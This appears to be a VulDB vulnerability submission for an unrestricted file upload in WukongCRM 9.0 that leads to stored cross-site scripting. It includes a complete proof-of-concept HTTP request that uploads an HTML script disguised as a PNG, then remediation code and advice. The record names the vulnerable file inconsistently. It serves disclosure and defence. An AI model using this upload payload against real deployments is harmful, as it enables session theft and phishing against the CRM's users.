Submit #587201: WukongSoftware WukongCRM-9.0-JAVA v9.0 Unrestricted Upload

Title: WukongSoftware WukongCRM-9.0-JAVA v9.0 Unrestricted Upload

Description:

Arbitrary File Upload vulnerability in WukongCRM-9.0-JAVA leads to Stored Cross-Site Scripting via

# NAME OF AFFECTED PRODUCT(S)

- WukongCRM

## Vendor Homepage

https://github.com/WukongSoftware

# AFFECTED AND/OR FIXED VERSION(S)

## Submitter

- aiyakami, Yveslawtox, luokuang1

## Vulnerable File

- AdminSysConfigController.java

## VERSION(S)

- V9.0

## Software Link

- https://github.com/WuKongOpenSource/WukongCRM-9.0-JAVA

# PROBLEM TYPE

## Vulnerability Type

- Arbitrary File Upload → Stored XSS

## Root Cause

- The file upload feature in WukongCRM fails to properly validate file content types and extensions (e.g., .svg, .html). Attackers can upload malicious files containing JavaScript code, which are then rendered by victims' browsers, leading to persistent Cross-Site Scripting (XSS).

## Impact

- Attackers can upload malicious files disguised as images, which, when rendered by the application or accessed by users, execute arbitrary JavaScript in their browsers.

Successful exploitation can lead to:

- Session hijacking (stealing cookies via document.cookie).
- Phishing attacks (fake login forms injected via XSS).
- Defacement (modifying website content to display false information).
- Malware distribution (redirecting users to malicious sites).

# DESCRIPTION

- During a security review of WukongCRM, a critical arbitrary file upload vulnerability was discovered in UploadController.java. The issue arises due to inadequate file validation, allowing attackers to upload malicious files that bypass security checks.

# Vulnerability details and POC

## Vulnerability location:

- **`AdminSysConfigController.java`**

## Payload:

Example: An attacker uploads an HTML file containing `<script>alert(1)</script>`, which executes when rendered in a browser.
```
POST /sysConfig/setSysConfig HTTP/1.1
Host: localhost:7878
Admin-Token: 295686fee64347fe9bb050be3669a7e4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: application/json, text/plain, */*
sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99"
Sec-Fetch-Site: same-origin
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHLZQn7vemaJqD2Pn
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Mode: cors
Referer: http://localhost:7878/index.html
sec-ch-ua-platform: "Windows"
Origin: http://localhost:7878
sec-ch-ua-mobile: ?0
Content-Length: 6557

------WebKitFormBoundaryHLZQn7vemaJqD2Pn
Content-Disposition: form-data; name="name"

adsa
------WebKitFormBoundaryHLZQn7vemaJqD2Pn
Content-Disposition: form-data; name="file"; filename="test.html"
Content-Type: image/png

{{unquote("<script>alert('xss')</script>")}}
------WebKitFormBoundaryHLZQn7vemaJqD2Pn--
```

## The following are screenshots of some specific information obtained from testing and running with the yakit tool:

![Image](https://github.com/user-attachments/assets/6e7c51ec-f2ec-4126-bdc5-20c6b9ef45a2)

![Image](https://github.com/user-attachments/assets/669164d2-85f2-466b-848c-7497f6f6689a)

# Suggested repair

1. **Strict File Extension Whitelisting**: Only allow safe extensions (e.g., .jpg, .png, .gif) and reject dangerous ones (e.g., .svg, .html, .php).
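The repair above is a server-side decision that must not rely on anything the client sends: the PoC request declares `Content-Type: image/png` for a file named `test.html` whose body is a script. The validator below is an added example written for this page, not code from WukongCRM or its controllers; the class and method names (`UploadValidator`, `validate`, `UploadRejectedException`) are hypothetical. It applies the extension allowlist from the suggested repair and additionally checks that the first bytes of the upload are the standard PNG, JPEG or GIF file signature, so a renamed HTML file is rejected even when the extension looks safe. The inputs in `main` are constructed to mirror the PoC.

```java
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Locale;
import java.util.Map;
import java.util.Set;

/**
 * Added example (not WukongCRM code): validates an upload before it is
 * written to disk or served back. Names here are hypothetical.
 */
public final class UploadValidator {

    /** Extensions the application is willing to store (an allowlist, not a denylist). */
    private static final Set<String> ALLOWED_EXTENSIONS = Set.of("jpg", "jpeg", "png", "gif");

    /** Standard file signatures each allowed format must start with, keyed by canonical extension. */
    private static final Map<String, byte[][]> MAGIC = Map.of(
        "png", new byte[][] { {(byte) 0x89, 'P', 'N', 'G', '\r', '\n', 0x1A, '\n'} },
        "jpg", new byte[][] { {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF} },
        "gif", new byte[][] { "GIF87a".getBytes(StandardCharsets.US_ASCII),
                              "GIF89a".getBytes(StandardCharsets.US_ASCII) }
    );

    /** MIME type the server will use when serving each format; the client's value is ignored. */
    private static final Map<String, String> SERVED_TYPE = Map.of(
        "png", "image/png", "jpg", "image/jpeg", "gif", "image/gif");

    public static final class UploadRejectedException extends Exception {
        UploadRejectedException(String reason) { super(reason); }
    }

    /**
     * Returns the canonical extension ("png", "jpg" or "gif") of an acceptable upload,
     * or throws. The client-supplied Content-Type is deliberately not a parameter:
     * the decision is made from the file name and the file bytes only.
     */
    public static String validate(String originalFilename, byte[] content)
            throws UploadRejectedException {
        if (originalFilename == null || content == null || content.length == 0) {
            throw new UploadRejectedException("empty upload");
        }
        // Drop any directory component so "../x.png" and "C:\x.png" both reduce to "x.png".
        String name = originalFilename.replace('\\', '/');
        name = name.substring(name.lastIndexOf('/') + 1);

        int dot = name.lastIndexOf('.');
        if (dot <= 0 || dot == name.length() - 1) {
            throw new UploadRejectedException("missing file extension");
        }
        // Only the last extension counts, so "x.png.html" is judged as ".html".
        String ext = name.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED_EXTENSIONS.contains(ext)) {
            throw new UploadRejectedException("extension not allowed: ." + ext);
        }
        String canonical = ext.equals("jpeg") ? "jpg" : ext;

        // The bytes must actually look like the format the extension claims.
        boolean magicOk = false;
        for (byte[] sig : MAGIC.get(canonical)) {
            if (content.length >= sig.length
                    && Arrays.equals(Arrays.copyOf(content, sig.length), sig)) {
                magicOk = true;
                break;
            }
        }
        if (!magicOk) {
            throw new UploadRejectedException("content does not match ." + ext + " signature");
        }
        return canonical;
    }

    /** MIME type to send when serving a stored file, derived from our own check rather than the upload. */
    public static String servedContentType(String canonicalExt) {
        return SERVED_TYPE.get(canonicalExt);
    }

    public static void main(String[] args) {
        // Constructed inputs: the PoC's script body, and a genuine PNG signature plus IHDR chunk start.
        byte[] html = "<script>alert('xss')</script>".getBytes(StandardCharsets.UTF_8);
        byte[] png = {(byte) 0x89, 'P', 'N', 'G', '\r', '\n', 0x1A, '\n', 0, 0, 0, 13, 'I', 'H', 'D', 'R'};

        tryUpload("test.html", html);       // rejected: .html is not in the allowlist
        tryUpload("test.png", html);        // rejected: bytes are not a PNG
        tryUpload("../../evil.png", png);   // accepted as "png"; the path component is discarded
    }

    private static void tryUpload(String filename, byte[] content) {
        try {
            String ext = validate(filename, content);
            System.out.println(filename + " -> accepted as " + ext + ", serve as " + servedContentType(ext));
        } catch (UploadRejectedException e) {
            System.out.println(filename + " -> rejected: " + e.getMessage());
        }
    }
}
```

Two details matter beyond the check itself. The `Content-Type` used when a stored file is served should come from `servedContentType`, never from what the uploader declared, and responses for user-supplied files should carry `X-Content-Type-Options: nosniff` so a browser does not sniff a script out of a file the server labelled as an image. Serving uploads from a separate origin removes the stored-XSS impact entirely, because a script that does execute there has no access to the application's session.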
Source: https://github.com/Aiyakami/CVE-1/issues/7
User: aiyakami (UID 85128)
Submission: 05/30/2025 04:24 AM (2 months ago)
Moderation: 06/08/2025 08:11 PM (10 days later)
Status: Accepted
VulDB Entry: 311637 [WuKongOpenSource WukongCRM 9.0 File Upload AdminSysConfigController.java cross site scripting]
Points: 20
